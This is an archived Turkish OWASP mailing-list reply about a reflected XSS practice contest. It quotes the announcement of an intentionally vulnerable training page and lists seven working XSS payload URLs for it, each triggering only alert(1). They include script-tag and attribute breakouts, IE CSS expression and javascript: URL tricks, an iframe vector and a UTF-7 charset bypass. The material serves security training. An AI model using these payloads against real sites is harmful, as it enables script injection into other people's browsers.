<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>Re: [Owasp-turkey] Reflected XSS Oyun Grubu ve Yarisma</title>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<meta http-equiv="Content-Style-Type" content="text/css">
<style type="text/css"><!--
body {
  margin: 5px 5px 5px 5px;
  background-color: #ffffff;
}
/* ========== Text Styles ========== */
hr { color: #000000}
body, table /* Normal text */
{
 font-size: 10pt;
 font-family: 'Arial';
 font-style: normal;
 font-weight: normal;
 color: #000000;
 text-decoration: none;
}
span.rvts1 /* Heading */
{
 font-weight: bold;
 color: #0000ff;
}
span.rvts2 /* Subheading */
{
 font-weight: bold;
 color: #000080;
}
span.rvts3 /* Keywords */
{
 font-style: italic;
 color: #800000;
}
a.rvts4, span.rvts4 /* Jump 1 */
{
 color: #008000;
 text-decoration: underline;
}
a.rvts5, span.rvts5 /* Jump 2 */
{
 color: #008000;
 text-decoration: underline;
}
span.rvts6
{
 font-size: 9pt;
}
span.rvts7
{
 font-size: 8pt;
 font-family: 'tahoma';
}
a.rvts8, span.rvts8
{
 font-size: 8pt;
 font-family: 'tahoma';
 color: #0000ff;
 text-decoration: underline;
}
a.rvts9, span.rvts9
{
 font-size: 8pt;
 font-family: 'tahoma';
 color: #0000ff;
 background-color: #ffffff;
 text-decoration: underline;
}
span.rvts10
{
 font-size: 13pt;
 font-family: 'times new roman';
 background-color: #ffffff;
 text-decoration: underline;
}
span.rvts11
{
 font-size: 13pt;
 font-family: 'times new roman';
}
/* ========== Para Styles ========== */
p,ul,ol /* Paragraph Style */
{
 text-align: left;
 text-indent: 0px;
 padding: 0px 0px 0px 0px;
 margin: 0px 0px 0px 0px;
}
.rvps1 /* Centered */
{
 text-align: center;
}
--></style>
</head>
<body>

<p><span class=rvts6>Merhaba,</span></p>
<p><span class=rvts6><br></span></p>
<p><span class=rvts6>Cok guzel uygulama, elinize saglik.&nbsp;</span></p>
<p><span class=rvts6><br></span></p>
<p><span class=rvts6>1) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector1=&lt;script&gt;alert(1)&lt;/script&gt;a</span></p>
<p><span class=rvts6>2) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector2="&gt;&lt;script&gt;alert(1)&lt;/script&gt;a</span></p>
<p><span class=rvts6>3) (IE6) http://www.webguvenligi.org/xsstb/reflected.php?vector3=background-image:url(javascript:alert(1))</span></p>
<p><span class=rvts6>veya (IE8) http://www.webguvenligi.org/xsstb/reflected.php?vector3=width:expression(alert(1));</span></p>
<p><span class=rvts6>4) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector4=%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E</span></p>
<p><span class=rvts6>5) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector5=%3Ciframe%20src=javascript:alert(1)%3E</span></p>
<p><span class=rvts6>6) (IE7, encoding auto-select[1]) http://www.webguvenligi.org/xsstb/reflected.php?vector6=%2bADw-script%2bAD4-%0d%0aalert(1)%2bADw-%2fscript%2bAD4-</span></p>
<p><span class=rvts6>7) (IE6) http://www.webguvenligi.org/xsstb/reflected.php?vector7=blue;background-image:url(javascript:alert(1))</span></p>
<p><span class=rvts6><br></span></p>
<p><span class=rvts6><br></span></p>
<p><span class=rvts6>[1] IE charset encoding Auto-Selection:</span></p>
<p><span class=rvts6>If 'Encoding' is set to 'Auto-Select', and Internet-Explorer finds a UTF-7 string in the first 4096 characters of the response's body, it will set the charset encoding to UTF-7 automatically, unless a certain charset encoding is already enforced.&nbsp;</span></p>
<p><span class=rvts6><br></span></p>
<p><span class=rvts6><br></span></p>
<p><span class=rvts6>Sertan Kolat</span></p>
<p><br></p>
<p><span class=rvts6>On Monday, June 15, 2009, 1:06:17 PM, you wrote:</span></p>
<div><table border=0 cellpadding=1 cellspacing=2 style="background-color: #ffffff;">
<tr valign=top>
<td width=1 style="background-color: #0000ff;"><br>
</td>
<td width=776>
<p><span class=rvts7>Merhaba,</span></p>
<p><span class=rvts7>Farklı Reflected XSS tekniklerini öğrenip uygulayabileceğiniz bir "oyun grubu" uygulamasına&nbsp;</span><a class=rvts8 href="http://www.webguvenligi.org/xsstb/reflected.php">http://www.webguvenligi.org/xsstb/reflected.php</a><span class=rvts7>&nbsp;erişebilirsiniz.</span></p>
<p><span class=rvts7>Uygulamada 7 parametreye (vector1, vector2, ..., vector7) uygulanabilecek xss saldiri vektorleri var. Bu vektorleri exploit ederek, bu maile reply-all olarak asagida verdigim link gibi gonderen ilk iki kisye;</span></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>1inciye Maldivler'e 2 kisilik 7 gun 7 gece seyehat</span></p>
<p><span class=rvts7>2inciye Son model araba &nbsp;&nbsp;</span></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>Yok daha neler!...&nbsp;</span></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>1inciye OWASP Membership T-Shirt'u (L)</span></p>
<p><span class=rvts7>2inciye OWASP Membership DVD'si</span></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>gonderecegim.</span></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>Ornek; (birinci tuyo benden)</span></p>
<p><a class=rvts8 href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E">http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E</a></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>Not 1: ekrana alert kutucugu icionde 1 yazdirmak yeterli</span></p>
<p><span class=rvts7>Not 2: onemli olan owasp-tr mail arsivlerine dusme sirasi</span></p>
<p><span class=rvts7>Not 3: en son yazdigim hediyeler gecerli! sonra "vay ben gormedim" olmasin</span></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>Proje Post'u:&nbsp;</span><a class=rvts8 href="http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html">http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html</a></p>
<p><span class=rvts7>--&nbsp;</span></p>
<p><span class=rvts7>Bedirhan Urgun</span></p>
<p><a class=rvts9 href="http://www.webguvenligi.org">http://www.webguvenligi.org</a></p>
<p><a class=rvts9 href="http://www.owasp.org/index.php/Turkey">http://www.owasp.org/index.php/Turkey</a></p>
<p><br></p>
<p><span class=rvts7>Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:&nbsp;</span></p>
<p><a class=rvts9 href="https://lists.owasp.org/mailman/listinfo/owasp-turkey">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a></p>
</td>
</tr>
</table>
</div>

</body></html>